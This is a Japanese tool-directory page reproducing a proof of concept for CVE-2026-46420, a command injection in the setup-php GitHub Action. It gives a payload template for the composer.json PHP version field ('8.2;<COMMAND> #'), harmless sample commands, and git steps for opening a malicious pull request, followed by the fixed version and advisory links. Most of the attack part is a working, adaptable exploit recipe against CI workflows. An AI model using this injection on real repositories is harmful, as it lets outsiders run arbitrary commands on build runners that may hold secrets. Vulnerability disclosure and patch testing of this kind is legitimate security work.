Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-46420 — PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution. | Kitploit
ツール/GitHubGitHub/jvr2022/cve-2026-46420
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubjvr2022/cve-2026-46420

CVE-2026-46420

PoC for CVE-2026-46420, command injection in shivammathur/setup-php via repository-controlled PHP version resolution.

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-46420 PoC

shivammathur/setup-php において、リポジトリ管理下のファイルから PHP バージョンを読み込む際に発生するコマンドインジェクション。

影響を受けるバージョン:

root@kitploit:~
>= 2.25.0, < 2.37.1

修正済みバージョン:

root@kitploit:~
>= 2.37.1

PoC

対象リポジトリには、プルリクエストの内容をチェックアウトして [email protected] を実行する、脆弱性のあるワークフローがすでに存在します。

攻撃者は composer.json を変更するだけです。

root@kitploit:~
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]

setup-php が composer.json から PHP バージョンを読み取ると、注入されたコマンドが生成されたシェルスクリプトに含まれ、実行されます。

結果:

root@kitploit:~
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc

再現手順

対象リポジトリからブランチを作成します:

root@kitploit:~
git checkout -b poc-test

クリーンな composer.json を PoC 版に置き換えます:

root@kitploit:~
cp attacker/composer.json composer.json

コミットしてプッシュします:

root@kitploit:~
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test

poc-test から main へのプルリクエストを開きます。

Actions の実行結果に、setup-php ステップの間に demo-app/.env.example が変更されたことが表示されるはずです。

コマンドの変更

ペイロードの形式は次のとおりです:

root@kitploit:~
8.2;<COMMAND> #

現在のペイロード:

root@kitploit:~
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #

実行されるコマンドは次のとおりです:

root@kitploit:~
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example

PoC の動作を変更するには、8.2; と # の間のコマンドを置き換えます。

ファイルを作成する場合:

root@kitploit:~
8.2;touch poc-executed #

ファイルに書き込む場合:

root@kitploit:~
8.2;printf 'poc executed\n' > poc-result.txt #

コマンドの出力を表示する場合:

root@kitploit:~
8.2;id #

composer.json の例:

root@kitploit:~
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}

修正

[email protected] 以降にアップグレードしてください。

パッチ適用済みバージョンでは、同じペイロードは拒否されます。

参照

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b

ツールをダウンロード